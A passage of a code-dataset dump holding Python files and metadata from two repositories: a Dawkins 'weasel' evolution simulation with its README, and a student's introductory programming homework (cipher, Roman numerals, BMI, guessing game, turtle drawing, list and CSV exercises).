print(len(acc_genes))\n# core_genes = genes.difference(acc_genes)\n print(len(genes))\n# print(len(list(filter(lambda x: x.startswith('NEIS'), genes))))\n# print(len(core_genes))\n \n \n# from pprint import pprint\n# pprint(sorted(genes))\n "
},
{
"alpha_fraction": 0.4566037654876709,
"alphanum_fraction": 0.505660355091095,
"avg_line_length": 11.090909004211426,
"blob_id": "64b76d5f11756a75ea14cf2de7da4df85c3919fa",
"content_id": "e993b3263c02bf3b3267196f33e1ff2db763fef7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 22,
"path": "/misc/test.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 19, 2017\n\n@author: javi\n'''\nimport math\nimport logging\n\ndef main():\n a = range(1000)\n c = 0\n for i in a:\n c += 1\n \n d = [i + 1 for i in a]\n\n return\n\n\nif __name__ == '__main__':\n import cProfile\n cProfile.run(main())"
}
] | 34 |
livz/WeaselProgram
|
https://github.com/livz/WeaselProgram
|
55c1ceacdea774448de84430e9972018248c2547
|
81a9bc654a609a6d82fa1c994878d716439653c3
|
b6f685b5e16afb0703bafae76a8720b55532454c
|
refs/heads/master
| 2021-01-21T05:29:39.602027 | 2017-02-26T09:52:57 | 2017-02-26T09:52:57 | 83,198,067 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5663225054740906,
"alphanum_fraction": 0.5822080969810486,
"avg_line_length": 27.613636016845703,
"blob_id": "a71282fb4bf28cfe6f1a640543b797fd63a9fd36",
"content_id": "245737818985efffe7ee71c6610d909fb25da8e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2518,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 88,
"path": "/weasel.py",
"repo_name": "livz/WeaselProgram",
"src_encoding": "UTF-8",
"text": "import string\nimport random\nimport itertools\n\n# Possible genes (whole character set)\ncharset = string.ascii_uppercase + \"_\"\n\n# Number of genes (characters in the string)\nnumGenes = 28\n\n# Create a next generation of mutated offspring \ndef mutate(state, numOffspring, mutationProb):\n mutations = []\n\n for i in range(numOffspring):\n mutation = \"\"\n for j in range(numGenes):\n # Will character j be mutated?\n p = random.randint(1, 100)\n if p<=mutationProb:\n # (Possible) Nasty bug no 1: charset NOT state (generations won't variate)\n newGene = charset[random.randint(0, len(charset)-1)] \n mutation += newGene\n else:\n mutation += state[j] \n mutations.append(mutation)\n \n return mutations\n\n# Compute Hamming distance between two strings\ndef hamming(str1, str2):\n return sum(itertools.imap(str.__ne__, str1, str2))\n\n\n# Select the fittest offspring from the pool\n# (Live free or die - UNIX)\ndef fittest(mutations, target):\n min = numGenes+1\n fittest = None\n\n for m in mutations:\n d = hamming(m, target)\n if d<min:\n min = d\n fittest = m \n\n # (Possible) Nasty bug no 2: return fittest NOT m (generations won't evolve at all)) \n return fittest \n\n# Colourise mutation based on distance from target\n# (We don't care about performance so light the Christmas tree)\ndef colorise(mutation, target):\n W = '\\033[0m' # white (normal)\n R = '\\033[31m' # red\n G = '\\033[32m' # green\n \n s = \"\"\n for i in range(len(mutation)):\n if mutation[i] == target[i]:\n s += G + mutation[i]\n else:\n s += R + mutation[i]\n s += W \n return s\n\n# While target not reached, evolve!\ndef evolve(numOffspring, mutationProb):\n cur = \"\".join(random.choice(charset) for _ in range(numGenes))\n fin = \"METHINKS_IT_IS_LIKE_A_WEASEL\"\n \n gen = 0\n \n print \"%4s %28s %4s\" % (\"Gen\", \"Mutation\", \"Dist\") \n while cur != fin:\n offspring = mutate(cur, numOffspring, mutationProb)\n cur = fittest(offspring, fin)\n gen += 1\n print \"%4d\" % gen, colorise(cur, fin), hamming(cur, fin)\n\n\nif __name__ == \"__main__\":\n # Number of offspring per generation\n numOffspring = 100\n\n # Probability that a gene (character) will mutate (percent)\n mutationProb = 5 \n\n evolve(numOffspring, mutationProb)\n"
},
{
"alpha_fraction": 0.718796968460083,
"alphanum_fraction": 0.7248120307922363,
"avg_line_length": 59.39393997192383,
"blob_id": "52727adcba713e97e2a9f2682c50717c017c8e35",
"content_id": "56bf8fe153d1ece2c067f11df5a9f47ac1e824ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2003,
"license_type": "no_license",
"max_line_length": 312,
"num_lines": 33,
"path": "/README.md",
"repo_name": "livz/WeaselProgram",
"src_encoding": "UTF-8",
"text": "# Evolution Weasel Program\n\n```\nHAMLET: Do you see yonder cloud that’s almost in shape of a camel?\nPOLONIUS: By th' mass, and ’tis like a camel indeed.\nHAMLET: Methinks it is like a weasel.\nPOLONIUS: It is backed like a weasel.\nHAMLET: Or like a whale.\nPOLONIUS: Very like a whale.\n```\n\n\n> The weasel program, Dawkins' weasel, or the Dawkins weasel is a thought experiment and a variety of computer simulations illustrating it. Their aim is to demonstrate that the process that drives evolutionary systems—random variation combined with non-random cumulative selection—is different from pure chance. \nThe thought experiment was formulated by Richard Dawkins, and the first simulation written by him; various other implementations of the program have been written by others.\n \nThe [\"Weasel\" algorithm](https://en.wikipedia.org/wiki/Weasel_program) implemented here runs as follows:\n\n1. **Start** - A random state (a string of 28 characters).\n2. **Produce offspring** - Make N copies of the string.\n3. **Mutate** - For each character in each of the copies, with a probability of P, replace the character with a new random character.\n4. Compare each new string with the target string \"METHINKS IT IS LIKE A WEASEL\", and give each a score\n * The number of offspring **N** and the probability **P** are configurable (default values: **N=100** and **P=5%**)\n * The algorithm used for scoring is [Hamming distance](https://en.wikipedia.org/wiki/Hamming_distance)\n * *In real life there is no final pre-established target!*\n5. ***Survival*** - Take the highest scoring string, and go to step **2**.\n\n\n\n## Conclusions\n\n* It's interesting to *vary the number of offsping per generation* and the *mutation probability* and see how generations evolve\n * For a higher N the generations evolve much more quickly towards the target\n * For a higher P evolution becomes random\n\n\n"
}
] | 2 |
mtouhidchowdhury/CS1114-Intro-to-python
|
https://github.com/mtouhidchowdhury/CS1114-Intro-to-python
|
2b622db0116842d13377d1eae3c744f5a7595275
|
31f311a1991f2d6affcbe13e6b8cd0c154bc59b6
|
cf2fd8ffb4777e44aa8c0b0522385ed86f12d799
|
refs/heads/master
| 2020-07-02T01:09:31.543145 | 2019-08-09T02:50:28 | 2019-08-09T02:50:28 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.512110710144043,
"alphanum_fraction": 0.5405908823013306,
"avg_line_length": 23.14765167236328,
"blob_id": "d80b6cb2b647a3a3976691c7b01d9bfea8e944a6",
"content_id": "792edb874b0f096211346a3a9d4c57da1e5b10a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3757,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 149,
"path": "/Homework 10/hw10.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nCS-UY 1114\r\nProfessor Frankl\r\nM Touhid Chowdhury\r\nmtc405 N14108583\r\nhw 10\r\nfunction that randomly creates a permutation, function that adds the\r\nvalue of two lists if length is equal, function that gives all prefixes,\r\nfunction that takes menu and then takes order of 3 people.\r\n'''\r\n\r\nimport random\r\n\r\ndef create_permutation(lst):\r\n length = len(lst)\r\n lim = len(lst)-1\r\n \r\n indexes = []\r\n while len(indexes) < length:\r\n randomNum = random.randint(0,lim)\r\n if randomNum in indexes:\r\n indexes = indexes\r\n else:\r\n indexes.append(randomNum)\r\n for number in indexes:\r\n lastNum = lst.pop(number)\r\n lst.append(lastNum)\r\n return lst\r\n\r\ndef main_q1():\r\n print(\"Q1\")\r\n print(\"Sample execution using [1,2,3,4,5,6,7]\")\r\n lst = create_permutation([1,2,3,4,5,6,7])\r\n print(lst)\r\nmain_q1()\r\n\r\n\r\n\r\ndef add_list(lst1,lst2):\r\n length = len(lst1)\r\n newList = []\r\n for number in range (0,length):\r\n newList.append(lst1[number]+lst2[number])\r\n return newList\r\n\r\ndef main_q2():\r\n print(\"Q2\")\r\n lst1 =[]\r\n lst2 = []\r\n userInput = 0\r\n userInput1= 0\r\n while userInput != 'done':\r\n userInput = input(\"Enter one number per line for first lst and 'done' when finished: \")\r\n if userInput == 'done':\r\n lst1= lst1\r\n else:\r\n lst1.append(int(userInput))\r\n while userInput1 != 'done':\r\n userInput1 = input(\"Enter one number per line for second lst and 'done' when finished: \")\r\n if userInput1 == 'done':\r\n lst2= lst2\r\n else:\r\n lst2.append(int(userInput1))\r\n if len(lst1) == len(lst2):\r\n newList = add_list(lst1,lst2)\r\n for number in newList:\r\n print(number)\r\n else:\r\n print(\" LISTS ARE NOT EQUAL LENGTH!\")\r\n\r\nmain_q2()\r\n\r\n\r\ndef create_prefix_lists(lst):\r\n copyList = []\r\n ranges = 0 \r\n length = len(lst)\r\n for number in range(0, len(lst)+1):\r\n copyList.append(lst)\r\n for number in range(0, len(lst)+1):\r\n if number == 0:\r\n copyList[number]= []\r\n else:\r\n copyList[number] = copyList[number][0:ranges]\r\n ranges +=1\r\n \r\n return copyList\r\n\r\n\r\ndef main_q3():\r\n print(\"Q3\")\r\n print(\"Sample execution using the list [1,2,3,4]\")\r\n newList = create_prefix_lists([1,2,3,4])\r\n print(newList)\r\n \r\nmain_q3()\r\n\r\n\r\n\r\ndef read_menu():\r\n user = int(input(\"How many items in the menu?: \"))\r\n n = 0\r\n lst = []\r\n while user > n:\r\n item = input(\"Enter item in the form 'name:price': \")\r\n lst.append(tuple(item.split(':')))\r\n n+= 1\r\n return lst\r\n \r\ndef read_order():\r\n userInput = ''\r\n newList = []\r\n while userInput != 'done':\r\n userInput = input(\"what do you want to order? Enter 'done' when finished: \")\r\n if userInput == 'done':\r\n userInput = userInput\r\n else:\r\n newList.append(userInput)\r\n return newList\r\n\r\n\r\ndef compute_price(menu_list,order_list):\r\n total = 0\r\n index = 0 \r\n for element in order_list:\r\n for item in menu_list:\r\n if element in item:\r\n total += float(item[1])\r\n index +=1 \r\n return total\r\n\r\ndef main_q4():\r\n print(\"Q4\")\r\n menu = read_menu()\r\n customers = 3\r\n whichCustomer = 1\r\n while customers != 0:\r\n print(\"Hello, you are customer #\",whichCustomer,\".\")\r\n orders = read_order()\r\n price = compute_price(menu,orders)\r\n tax = price * 0.085\r\n tip = price * 0.15\r\n price = price + tip + tax \r\n print(\"Your total is \", round(price,2))\r\n price = 0\r\n customers -= 1\r\n whichCustomer += 1\r\n \r\nmain_q4()\r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6112083792686462,
"alphanum_fraction": 0.6199649572372437,
"avg_line_length": 33.6875,
"blob_id": "f9828d5c1a6a2ddac6460616968346308b15d93b",
"content_id": "778aa8c5dee4ea2f4b81d4396e7038b69fac9aa9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 16,
"path": "/Homework 4/hw4q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting word from user \r\nuserWord = input(\"Please enter a word: \")\r\n\r\n#setting vowel and consonant count to 0 \r\nvowels = 0\r\nconsonants = 0\r\n\r\n#looping through the word and checking if it has vowels or consonant \r\nfor letter in userWord:\r\n if letter == 'a' or letter == 'e' or letter == 'i' or letter == 'o' or letter == 'u' or letter == 'A' or letter == 'E' or letter == 'I' or letter == 'O' or letter == 'U' :\r\n vowels += 1\r\n else:\r\n consonants += 1\r\n\r\n#printing the outcome \r\nprint(userWord, \"has\", vowels,\"vowels and\", consonants, \"consonants.\")\r\n"
},
{
"alpha_fraction": 0.596393883228302,
"alphanum_fraction": 0.6088765859603882,
"avg_line_length": 31.85714340209961,
"blob_id": "9855e06f69b6ada214686a9e1834044ab0bb9efe",
"content_id": "49334c0464ab73ae0ae54208d0a57da50c53268d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 21,
"path": "/Homework 7/hw7q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n\r\n#getting string and number to shift \r\nstring = input(\"Please enter a text\")\r\nshift = int(input(\"please enter a shift:\"))\r\n#empty string to put the ciphered message in\r\ncipher =\"\"\r\n#loop through string \r\nfor currentLetter in string:\r\n if currentLetter.isupper():\r\n curciph = ord(currentLetter)+shift\r\n if curciph >= 91:\r\n curciph = curciph - 26\r\n cipher = cipher + chr(curciph)\r\n elif currentLetter.islower():\r\n curciph = ord(currentLetter)+ shift\r\n if curciph >= 123:\r\n curciph = curciph -26\r\n cipher = cipher + chr(curciph)\r\n else:\r\n cipher = cipher + currentLetter\r\n#print outcome \r\nprint(\"Encrypted string is:\", cipher) \r\n"
},
{
"alpha_fraction": 0.6438923478126526,
"alphanum_fraction": 0.6604554653167725,
"avg_line_length": 26.294116973876953,
"blob_id": "3f24788fc4ecb7013af55567db9fb2ba6a05c672",
"content_id": "4ec3fe839dc969c1bda281581b708356c2260c7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 483,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/Homework 5/hw5q5b.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#setting total to 1 \r\ntotal = 1\r\n#setting userNumber to 1 \r\nuserNumber = 1\r\n#counting number of digits \r\nnumberOfDigits = 0\r\nwhile userNumber != \"Done\":\r\n userNumber = input(\"Please enter a positive integer or 'Done': \")\r\n if userNumber == \"Done\":\r\n total = total \r\n else:\r\n total = int(userNumber) * total\r\n numberOfDigits+= 1\r\n#calculating geometric mean \r\ngeometricMean = total**(1/numberOfDigits)\r\n#printing output\r\nprint(round(geometricMean,3))\r\n"
},
{
"alpha_fraction": 0.5380434989929199,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 41.5,
"blob_id": "5b71f7dfe1500cd85e7275edf8831da679e7367f",
"content_id": "4b314944612889e1a0a69be011448879006d119b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 4,
"path": "/Homework 7/hw7q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#printing the table using exponents 1,2,3,4,5 and base 1-11 exclusive \r\nfor exponent in range (1,6):\r\n for base in range(1,11):\r\n print(base**exponent, end= \"\\t\")\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6848958134651184,
"avg_line_length": 29.25,
"blob_id": "f464fa20009a0619fca425c08b0a69a3f05b9809",
"content_id": "71ae81093fa6a4aba34fd6c005a47042bc81d80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/Homework 5/hw5q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user input \r\nuserInput = int(input(\"Please enter a positive integer: \"))\r\n#setting counter for total to 0 \r\ntotal = 0\r\n#starting odd number from 1\r\noddNumbers = 1\r\n#while total is less than the userInput, print odd number and add 2\r\n#add to total so loop doesnt run infinitely \r\nwhile total < userInput:\r\n print (oddNumbers)\r\n oddNumbers += 2\r\n total += 1 \r\n \r\n"
},
{
"alpha_fraction": 0.6131805181503296,
"alphanum_fraction": 0.6284622550010681,
"avg_line_length": 26.19444465637207,
"blob_id": "999394cad04588d0607c98a3089660ff95ff1911",
"content_id": "ea2743312da5eb14072d94b8c9c29ea242e0deda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/Homework 8/hw8q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n\r\n'''\r\nM Touhid Chowdhury\r\nmtc405\r\n \r\ndrawTriangle prints a Triangle given number of lines, the amount of shift , and the character to use\r\ndrawTree prints a tree given number of Triangles and the character\r\nmain() interacts with the user \r\n'''\r\n\r\ndef drawTriangle(integer, shift, character):\r\n\r\n number_of_char = 1\r\n number_of_spaces = integer + shift - 1\r\n for i in range(1, integer+1):\r\n line = ' '*number_of_spaces + character*number_of_char\r\n print(line)\r\n number_of_char = number_of_char+2\r\n number_of_spaces = number_of_spaces-1\r\n\r\ndef drawTree(numberOfTriangles,character):\r\n start = 1\r\n shift= numberOfTriangles -1\r\n for i in range(2,numberOfTriangles+2):\r\n drawTriangle(i, shift,character)\r\n shift-=1\r\n start+= 1\r\n numberOfTriangles+=1\r\n\r\n\r\ndef main():\r\n userCharacter = input(\"enter character to build with: \")\r\n userNumberTriangle= int(input(\"number of triangles: \"))\r\n drawTree(userNumberTriangle,userCharacter)\r\n \r\n \r\nmain()\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.47837838530540466,
"alphanum_fraction": 0.5027027130126953,
"avg_line_length": 20.9375,
"blob_id": "0925c254b246b91ae5cd4156e06541972c38863b",
"content_id": "ec962266ec96ffb49a6584fc6bd45bec0fe3bb29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 370,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/Homework 5/hw5q7.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user bound\r\nuserInput = int(input(\"Please enter a positive integer: \"))\r\n#begin with 2 \r\nnumber = 2\r\n\r\nwhile number < userInput or (number == userInput):\r\n even = 0\r\n odd = 0\r\n for x in str(number):\r\n if int(x) % 2 == 0:\r\n even += 1\r\n else:\r\n odd += 1\r\n if even > odd:\r\n print(number)\r\n number += 2 \r\n"
},
{
"alpha_fraction": 0.517699122428894,
"alphanum_fraction": 0.5648967623710632,
"avg_line_length": 17.941177368164062,
"blob_id": "30930230615e8fe2e6a96b5120339fbcad075bc0",
"content_id": "63be36c3abba7f064b630e43db770f8c97c9b806",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 34,
"path": "/Homework 5/hw5q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting user integer\r\ninteger = int(input(\"Please enter a positive integer: \"))\r\n#assign respective roman numeral to its value\r\nI = 1\r\nV = 5\r\nX = 10\r\nL = 50\r\nC = 100\r\nD = 500\r\nM = 1000\r\n\r\nroman =\"\"\r\nwhile integer >= M:\r\n integer = integer - 1000\r\n roman+= \"M\"\r\nwhile integer >= D:\r\n integer = integer - 500\r\n roman+= \"D\"\r\nwhile integer >= C:\r\n integer = integer - 100\r\n roman+= \"C\"\r\nwhile integer >= L:\r\n integer = integer - 50\r\n roman+= \"L\"\r\nwhile integer >= X:\r\n integer = integer - 10\r\n roman+= \"X\"\r\nwhile integer >= V:\r\n integer = integer - 5\r\n roman+= \"V\"\r\nwhile integer >= I:\r\n integer = integer - 1\r\n roman+= \"I\"\r\nprint(roman)\r\n"
},
{
"alpha_fraction": 0.6266447305679321,
"alphanum_fraction": 0.7351973652839661,
"avg_line_length": 16.42424201965332,
"blob_id": "de1dd7d9d282e84eccfb8b2b12f776c240f95b8e",
"content_id": "257714eff43d69571bdf3247b51a5f038d840100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 33,
"path": "/Homework 2/hw2q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#drawing a titled square with thre 20 degree turns \r\n\r\nimport turtle\r\n\r\n#first square\r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\n#secondsquare\r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\n#third square \r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\n"
},
{
"alpha_fraction": 0.6292397379875183,
"alphanum_fraction": 0.6456140279769897,
"avg_line_length": 41.43589782714844,
"blob_id": "e2836dded795cfd45e297f05d467e04c35901858",
"content_id": "5010573203cd60bf14a93815c353332e18845494",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1710,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 39,
"path": "/Homework 7/hw7q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#importing module\r\nimport random\r\n#generating a random number and assign to a variable\r\nrandomNumber = random.randint(1,100)\r\n#set number of guesses to 0 and how many remain to 5 \r\nnumberGuesses= 0\r\nguessRemain = 5\r\n#first guess\r\nuserGuess = int(input(\"please enter a number between 1 and 100: \"))\r\n# minus from guess remain and adding to number of guesses \r\nguessRemain -= 1\r\nnumberGuesses += 1\r\n# making bounds for the ranges \r\nlowerBound = 0\r\nupperBound = 101\r\n#if first guess correct then goes to if otherwise goes to else \r\nif userGuess == randomNumber:\r\n print(\"Your Correct!\")\r\n#loop till guesses remaining is 0 and user's guess is the number \r\nelse:\r\n while guessRemain != 0 and userGuess != randomNumber :\r\n if userGuess < randomNumber:\r\n lowerBound = userGuess\r\n userGuessLine = \"Guess again between \"+ str(lowerBound + 1) + \" and \" + str(upperBound - 1) + \". You have \" + str(guessRemain) + \" guesses remaining: \"\r\n userGuess = int(input (userGuessLine))\r\n guessRemain -= 1\r\n numberGuesses += 1\r\n elif userGuess > randomNumber:\r\n upperBound = userGuess\r\n userGuessLine = \"Guess again between \" + str(lowerBound + 1) + \" and \"+ str(upperBound - 1) + \". You have \" + str(guessRemain) + \" guesses remaining: \"\r\n userGuess = int(input (userGuessLine))\r\n guessRemain -= 1\r\n numberGuesses += 1\r\n#output if won tells how many guesses took if lost then tells user that he/she lost \r\nif userGuess == randomNumber:\r\n line= \"Congrats! you guessed the answer in \" + str(numberGuesses) + \" guesses!\"\r\n print(line)\r\nelse:\r\n print (\"You ran out of guesses\")\r\n \r\n \r\n\r\n"
},
{
"alpha_fraction": 0.45610859990119934,
"alphanum_fraction": 0.4714932143688202,
"avg_line_length": 21.17021369934082,
"blob_id": "48a254cef1a5263725cfce9d8af61fe2b56efdc8",
"content_id": "76d1d5e1db67113a316123ce05aa6ea2d38211fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 47,
"path": "/Homework 12/hw12.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\n\r\nM. Touhid Chowdhury\r\nmtc405\r\nN14108580\r\nProfessor Frankl\r\nHW 12\r\nNote: used the windows file\r\nhad extra lines so removed that using if statement \r\n\r\n'''\r\n\r\n\r\ndef function(file,user):\r\n file = open(file, 'r')\r\n empty = []\r\n header = file.readline()\r\n string = \"\"\r\n for line in file:\r\n line = line.strip()\r\n lst = line.split(',,')\r\n if '' not in lst:\r\n Id = lst[0]\r\n stop = lst[1]\r\n train_line = Id[0]\r\n if train_line == str(user):\r\n if stop not in empty:\r\n empty.append(stop)\r\n if empty == []:\r\n print(\"This train line does not exist\")\r\n else:\r\n print(user, \"line:\", end = ' ')\r\n for stop in empty:\r\n string += stop+ \", \"\r\n print(string[:-2])\r\n print(\"\\n\")\r\n \r\n\r\ndef main():\r\n keepGoing = True\r\n while keepGoing:\r\n user = input(\"Enter a train line or 'done' to stop: \").upper()\r\n if user.upper() != 'DONE':\r\n function('train stop data-Windows.csv', user)\r\n else:\r\n keepGoing = False\r\nmain()\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.6984265446662903,
"alphanum_fraction": 0.7010489702224731,
"avg_line_length": 33.75,
"blob_id": "eae1757a2d8f3cd01bb4df79853631a584ea642d",
"content_id": "2c66841602d4033bb867fa54423a6ad05a486dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1144,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 32,
"path": "/Homework 4/hw4q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting users desired expression\r\nuserExpression = input(\"Please input a mathematical expression: \")\r\n\r\n#position of the blank\r\npositionOfBlank = userExpression.find(' ')\r\n\r\n#getting first number by indexing to the blank \r\nfirstNumber = userExpression[0:positionOfBlank]\r\n\r\n#taking the remainder of the statement \r\nremaining = userExpression[positionOfBlank+1:]\r\n\r\n#getting the operator by taking the next first index\r\noperand = remaining[0]\r\n\r\n#getting second number by taking the remainder after the position\r\nsecondNumber = remaining[positionOfBlank:]\r\n\r\n#checking what the operator is and doing the calculation\r\n#printing the result \r\nif operand == '+':\r\n total = int(firstNumber) + int(secondNumber)\r\n print(firstNumber,\" + \",secondNumber,\" = \", total)\r\nif operand == '-':\r\n total = int(firstNumber) - int(secondNumber)\r\n print(firstNumber,\" - \",secondNumber,\" = \", total)\r\nif operand == '/':\r\n total = int(firstNumber) / int(secondNumber)\r\n print(firstNumber,\" / \",secondNumber,\" = \", total)\r\nif operand == '*':\r\n total = int(firstNumber) * int(secondNumber)\r\n print(firstNumber,\" * \",secondNumber,\" = \", total)\r\n"
},
{
"alpha_fraction": 0.6527331471443176,
"alphanum_fraction": 0.6816720366477966,
"avg_line_length": 34.588233947753906,
"blob_id": "1736f9fdee85d6ddcdd1579875681da5aca37e10",
"content_id": "0f95a4ece403821b3845d4f892fb8c1f909953e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 17,
"path": "/Homework 3/hw3q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#calculate the BMI of person by taking their weight and height then classifying them\r\n\r\nweight = float(input(\"please enter weight in kilograms:\")) #user weight input\r\nheight = float(input(\"please enter height in meters:\"))# user height input\r\n\r\nBMI = weight / (height**2) #using the BMI formula \r\n\r\nprint (\"BMI is\", round(BMI,7))#printing the results \r\n#classifying the person based on bmi\r\nif BMI < 18.5:\r\n print(\"Your considered underweight.\")\r\nelif 18.5 >= BMI <= 24.9:\r\n print(\"Your considered normal.\")\r\nelif 25>= BMI <= 29.9:\r\n print(\"Your condered overweight.\")\r\nelif BMI >= 30:\r\n print(\"Your Obese!\")\r\n"
},
{
"alpha_fraction": 0.7033898234367371,
"alphanum_fraction": 0.7322033643722534,
"avg_line_length": 26.047618865966797,
"blob_id": "287c5c8385423f46ab072ef0fd0f1ac53466f47d",
"content_id": "3b3110928b3f80affbe43888d10dbdb011603e1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 21,
"path": "/Homework 2/hw2q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#takes 3 digit positive integer and prints the sum\r\n\r\n\r\nuser = int(input(\"please input a three digit positive number\"))\r\n#getting user input\r\n\r\nfirstDigit = user // 100\r\n#first digit attained by dividing by 100 without remainder\r\n\r\nsecondDigit = (user // 10) % 10\r\n#second digit attained by dividing by 10 without remainder, then taking remainder of that\r\n\r\n\r\nthirdDigit = user % 10\r\n# dividing by 10 and taking the remainder only(ones place)\r\n\r\nsumOfDigits = firstDigit + secondDigit + thirdDigit\r\n#sum of the digits\r\n\r\nprint(\" The sum of its digits is\", sumOfDigits)\r\n#printing outcome \r\n"
},
{
"alpha_fraction": 0.5291507244110107,
"alphanum_fraction": 0.5628404021263123,
"avg_line_length": 30.899999618530273,
"blob_id": "d058fc1103bdead558a7c2301f8aa361f8badb8c",
"content_id": "27226f0bc4ab52c671b8dc078a9e6fefa7695c4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4957,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 150,
"path": "/Homework 8/hw8q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
